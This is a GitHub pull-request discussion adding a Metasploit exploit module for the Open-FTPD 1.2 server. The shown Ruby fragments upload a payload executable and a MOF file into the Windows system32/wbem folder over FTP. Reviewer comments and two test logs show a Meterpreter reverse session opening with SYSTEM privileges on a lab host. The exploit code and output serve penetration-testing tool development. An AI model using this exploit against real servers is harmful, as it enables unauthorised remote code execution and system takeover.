Add Open-FTPD 1.2 Writable Directory Traversal Execution #2211

Merged
merged 1 commit into from Aug 12, 2013

Projects

None yet

2 participants

@bcoles
Contributor
bcoles commented Aug 12, 2013

Add Open-FTPD 1.2 Writable Directory Traversal Execution

Homepage: http://sourceforge.net/projects/open-ftpd/
Tested on 1.2 (Windows XP SP3) (EN)

Open-FTPD 1.2 Writable Directory Traversal Execution

@jvazquez-r7
Contributor

Processing...

@jvazquez-r7 jvazquez-r7 commented on the diff Aug 12, 2013
modules/exploits/windows/ftp/open_ftpd_wbem.rb
+ send_cmd(['TYPE', 'I'], true, conn)
+
+ # Prepare active mode: Get attacker's IP and source port
+ src_ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
+ src_port = datastore['SRVPORT'].to_i
+
+ # Prepare active mode: Convert the IP and port for active mode
+ src_ip = src_ip.gsub(/\./, ',')
+ src_port = "#{src_port/256},#{src_port.remainder(256)}"
+
+ # Set to active mode
+ print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"")
+ send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)
+
+ # Tell the FTP server to download our file
+ send_cmd(['STOR', filename], false, conn)
@jvazquez-r7
jvazquez-r7 Aug 12, 2013 Contributor

According to the code, it looks like an arbitrary File Upload more than a directory traversal vulnerability, as written in the Name and Description of the module. Is it right or I'm forgetting something ?

Thanks!

@bcoles
bcoles Aug 12, 2013 Contributor

You're correct. 'Arbitrary file upload' is more applicable.

@jvazquez-r7
jvazquez-r7 Aug 12, 2013 Contributor

Awesome, in this case, fixing things by myself, and landing, are just minor changes, thanks @bcoles!

@jvazquez-r7 jvazquez-r7 commented on the diff Aug 12, 2013
modules/exploits/windows/ftp/open_ftpd_wbem.rb
+
+ # Largely stolen from freefloatftp_wbem.rb
+ def exploit
+ path = datastore['PATH']
+ exe_name = "#{path}/system32/#{rand_text_alpha(rand(10)+5)}.exe"
+ mof_name = "#{path}/system32/wbem/mof/#{rand_text_alpha(rand(10)+5)}.mof"
+ @mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
+ @exe = generate_payload_exe
+ @stage = :exe
+
+ begin
+ t = framework.threads.spawn("reqs", false) {
+ # Upload our malicious executable
+ u = upload(exe_name)
+ # Upload the mof file
+ upload(mof_name) if u
@jvazquez-r7
jvazquez-r7 Aug 12, 2013 Contributor

According to the code, it looks like an arbitrary File Upload more than a directory traversal vulnerability, as written in the Name and Description of the module. Is it right or I'm forgetting something ?

Thanks!

@jvazquez-r7 jvazquez-r7 commented on the diff Aug 12, 2013
modules/exploits/windows/ftp/open_ftpd_wbem.rb
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::Ftp
+ include Msf::Exploit::Remote::TcpServer
+ include Msf::Exploit::EXE
+ include Msf::Exploit::WbemExec
+ include Msf::Exploit::FileDropper
+
+ def initialize(info={})
+ super(update_info(info,
@jvazquez-r7
jvazquez-r7 Aug 12, 2013 Contributor

Please add the next option to the metadata:

'Stance'         => Msf::Exploit::Stance::Aggressive,

In this way the TcpServer will finish once the exploit finishes :). Even when you're using the TcpServer mixin here, it's an aggressive but not a passive exploit.

@jvazquez-r7
Contributor

Once comments are clarified by @bcoles it's ready to be landed:

msf exploit(open_ftpd_wbem) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Server started.
[*] 192.168.172.208:21 - Trying to upload bexsGiK.exe
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[*] 192.168.0.3:50356 - Sending executable (73802 bytes)
[+] 192.168.172.208:21 - Upload successful
[*] 192.168.172.208:21 - Trying to upload BRhkiOcs.mof
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[*] 192.168.0.3:50358 - Sending MOF (2190 bytes)
[+] 192.168.172.208:21 - Upload successful
[*] Sending stage (751104 bytes) to 192.168.172.208
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.208:2481) at 2013-08-12 09:10:39 -0500
[+] Deleted wbem\mof\good\BRhkiOcs.mof

^C[-] Exploit failed: Interrupt 
[*] Server stopped.
[!] This exploit may require manual cleanup of: bexsGiK.exe

meterpreter > exit
[*] Shutting down Meterpreter...

@jvazquez-r7 jvazquez-r7 pushed a commit that referenced this pull request Aug 12, 2013
jvazquez-r7 Land #2211, @bcoles exploit for CVE-201-2620 b1fc830
@jvazquez-r7 jvazquez-r7 merged commit d63d7bc into rapid7:master Aug 12, 2013

1 check passed

default The Travis CI build passed
Details
@jvazquez-r7
Contributor

Last changes here: 8ac01d3

Final test:

msf exploit(open_ftpd_wbem) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Server started.
[*] 192.168.172.208:21 - Trying to upload luguTktG.exe
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[*] 192.168.0.3:52338 - Sending executable (73802 bytes)
[+] 192.168.172.208:21 - Upload successful
[*] 192.168.172.208:21 - Trying to upload rgzFGsEGKn.mof
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[+] 192.168.172.208:21 - Upload successful
[*] 192.168.0.3:52340 - Sending MOF (2199 bytes)
[*] Sending stage (751104 bytes) to 192.168.172.208
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.208:1039) at 2013-08-12 11:18:55 -0500
[+] Deleted wbem\mof\good\rgzFGsEGKn.mof

^C[-] Exploit failed: Interrupt 
[*] Server stopped.
[!] This exploit may require manual cleanup of: luguTktG.exe

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
emeterpreter > exit
[*] Shutting down Meterpreter...

Thanks @bcoles !

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment